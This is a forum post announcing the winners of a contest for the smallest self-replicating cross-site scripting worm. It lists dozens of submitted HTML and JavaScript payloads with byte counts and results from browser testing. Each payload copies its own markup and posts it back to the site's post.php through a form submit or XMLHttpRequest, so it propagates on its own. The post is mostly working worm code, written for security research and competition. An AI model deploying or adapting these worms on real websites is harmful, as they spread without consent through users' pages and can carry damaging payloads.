Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 10, 2008 05:08PM

Okay, Geez, this was a nightmare to test - but it looks like we do have a winner, but it's probably not what you think. Almost every one of these vectors failed to work in IE7.0 (if they worked at all). A huge percentage broke various rules, or grew even if they did work. Lots didn't work on pages with no other content. Others double encoded, or sent the wrong encoding in Firefox via XMLHttpRequest (lots of those, actually). So instead of just checking one or two, I actually had to check all of them to see what happened, which ended up taking a looot longer. I had to make a few judgment calls since I was seeing the same things over and over again, but you should be able to see for yourself if you have any specific questions.

Weirdly enough, we had a two-way tie (as far as I can tell, because there was so much noise in this thread). It's made equally complex by the fact that the vectors are almost identical. So the winners are *drumroll* ma1's vector and sirdarckcat's vector:

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

and

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

Both were a stunningly small 161 bytes! Congrats to both of the guys and a huge round of applause to everyone who submitted results. I was completely shocked by the results, as I thought we'd land at a much smaller number, but I think that was muddied by the fact that many people couldn't test their code in IE7.0.

And for those who want to see how the rest of the results panned out here are the judge results (feel free to contest them - it was a ton of work going through them so I _may_ have made errors):


spyware - 136 Doesn't work in Firefox 2.0.0.11
ý<form onFocus="submit(alert('xss'))"><input onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe onLoad="parentNode.focus()">ó


gareth - 162 Doesn't work in Firefox 2.0.0.11
<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">


digi7al64 (via gareth) - 144 Doesn't work in Firefox 2.0.0.11
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>


doctordan - 154 Doesn't work in Firefox 2.0.0.11
„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


ma1 - 165 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">


.mario - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


Ronald - 147 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 149 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">


Gareth - 148 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;


Ronald - 198 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


Ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 142 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>


ma1 - 201 Doesn't work in Firefox 2.0.0.11 on second iteration
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"


gareth - 209 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


Ronald - 203 Works on FF and IE!!! (does change order around, but no growth):
<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Turns into (also 203 chars):
<B><IMG onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))" src=""></B>


ma1 - 132 Doesn't work in Firefox 2.0.0.11 as written
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"


ma1 - 140 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"


ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"


gareth - 188 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">


gareth - 209 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


matt presson (via gareth) - 140 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">


gareth - 128 Missing payload
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">


digi7al64 - 140 Doesn't work in Firefox 2.0.0.11
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>


glacialphoenix (via digi7al64) - 226 Doesn't work in Firefox 2.0.0.11
<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>


doctordan - 133 Invalid as parens may exist elsewhere on the page
{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B


digi7al64 - 133 Doesn't work in Firefox 2.0.0.11
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>


digi7al64 - 134 IE only
<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>


digi7al64 - 111 IE only
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>


badsamaritan - 168 Works in FF but grows
<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>


gareth - 146 Works in FF but grows
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"


gareth - 153 Works in FF with no growth but doesn't work in IE7.0
<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">


ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


gareth - 204 Works in FF with no growth but doesn't work in IE7.0
_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>


ronald - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


gareth - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">


doctordan - 139 Invalid as parens may exist elsewhere on the page
{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9


doctordan (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">


gareth - 142 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">


doctordan (via ronald) - 130 Doesn't work in Firefox 2.0.0.11
<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b


doctordan (via ronald) - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


matt presson (via backstorm/ronald) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>


backstorm - 125 Doesn't work in Firefox 2.0.0.11
<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>


matt presson (via backstorm) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 131 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>



sdc - 154 (via ma1/.mario) Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


.mario (via ma1) - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


ma1 - 155 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


.mario - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


.mario - 134 Doesn't work in Firefox 2.0.0.11
<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>


ronald - 130 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 135 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>


bwb labs - 251 - Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>


matt presson - 128 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>


gareth - 156 Doesn't work in Firefox 2.0.0.11
<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

ronald - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

spyware - 173 Doesn't work in Firefox 2.0.0.11
<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>


spyware - 157 Doesn't work in Firefox 2.0.0.11
<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>


spyware - 146 Doesn't work in Firefox 2.0.0.11
<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">


gareth - 206 Doesn't work in Firefox 2.0.0.11
<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>


ronald - 136 Breaks DOM knowledge rule
<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">


beni (via ronald) - 131 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>


ronald - 111 Doesn't work in Firefox 2.0.0.11 and grows
<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">


ronald - 174 Grows
<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">


gareth - 192 Uses the onload event handler which may already be assigned
<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"


mario (via beni) - 177 Works in FF but breaks in IE7.0 on second iteration
<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>


beni - 171 Works in FF but breaks in IE7.0 on second iteration
<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>


gareth - 175 Doesn't work in Firefox 2.0.0.11
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


gareth - 153 Breaks DOM knowledge rule
<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>


gareth - 147 Breaks DOM knowledge rule
<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"


gareth - 175 Breaks DOM knowledge rule
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


ronald - 185 Breaks DOM knowledge rule
<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


.mario (via ronald) - 161 Breaks DOM knowledge rule
<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (doctype check) - 165 Breaks DOM knowledge rule
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (via kyran) - 185 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>

bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>


bwb labs - 255 Works in both FF and IE7.0!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


spikeman - 154 Grows
<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="


bwb labs (via dbloom) - 256 Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


.mario - 158 Doesn't work in Firefox 2.0.0.11
<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>


.mario - 159 Works in FF with no growth but doesn't work in IE7.0
<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"


kyran - 183 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>


sdc - 154 - Grows in FF
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=


sdc - 154 - Grows in FF (same as above)
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=

ma1 (via gareth) - Works in FF but grows and stops working in IE7.0
<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">


gareth - 154 Posts to the wrong page
<form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">


gareth - 160 Posts to the wrong page
<form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>


dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>


ma1 - 157 Breaks DOM knowledge rule
<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


doctordan - 158 Doesn't work in Firefox 2.0.0.11
<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


spyware - 141 Doesn't work in Firefox 2.0.0.11 if body content is present - so close!
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>


ma1 - 142 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>


ronald - 143 Doesn't work in Firefox 2.0.0.11
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


sdc (via ronald) - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined


sdc (via gareth) - 169 Doesn't work in Firefox 2.0.0.11
<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">


gareth - 164 Posts to the wrong page
<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>


sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


.mario - 132 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>


.mario - 141 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>


ronald - 132 Doesn't work in Firefox 2.0.0.11
<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>


spyware - 129 Doesn't work in Firefox 2.0.0.11
ý<FORM action=post.php method=post><INPUT onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();" name=content></FORM>


spyware - 135 Doesn't work in Firefox 2.0.0.11
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>


mario (via ronald) - 142 Doesn't work in Firefox 2.0.0.11
<form id=m><input name="content"><script>with(m)m[0].value='<form id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>


ronald - 141 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


ronald - 145 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


ronald - 147 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content><script>_.content.value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


spikeman (via .mario) - 132 Requires user interaction
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario - 140 Requires user interaction
<form id=j><button onclick="j.action=j.method='post';value='<form id=j>'+j.innerHTML+'</form>';alert('XSS')" name="content"></button></form>


.mario - 136 Requires user interaction
<form><button onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)" name="content">


.mario - 125 Requires user interaction
<form id=i><button onclick="i.method=i.action='post',value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario (via all) - 125 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">


.mario - 126 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">


.mario - 171 Works in FF with no growth and works in IE and actually shrinks!!!
<b><img onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()" src="m"><form id="i" action="post" method="post"><input name="content"></form></b>


bwb labs - 271 Works in both FF with no growth and IE!!!
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>


barbarianbob (via ma1) - 127 Requires user interaction
<form<input name="content" onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">


spyware - 140 Requires user interaction
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>


hallvors - 150 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">


hallvors - 185 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">


shawn (via ma1) - 128 Requires user interaction
<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">


bwb labs - 266 Works in FF with no growth and IE!!!
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>



spyware - 134 Requires user interaction
ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>


ma1 - 129 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">


ma1 - 136 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">


spyware - 134 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc (via shawn) - 143 Doesn't work in Firefox 2.0.0.11
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


spyware - 151 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc - 150 Requires user interaction
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>


spyware - 137 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>


sdc - 164 Doesn't work in Firefox 2.0.0.11
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>



sdc - 141 Doesn't work in Firefox 2.0.0.11
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>


spyware - 122 Requires user interaction
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


amado - 140 Doesn't work in Firefox 2.0.0.11
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>


sdc - 155 Doesn't work in Firefox 2.0.0.11
<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>


ma1 - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">


dev80 - 159 Doesn't work in Firefox 2.0.0.11
<script>function p() {alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


sdc - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
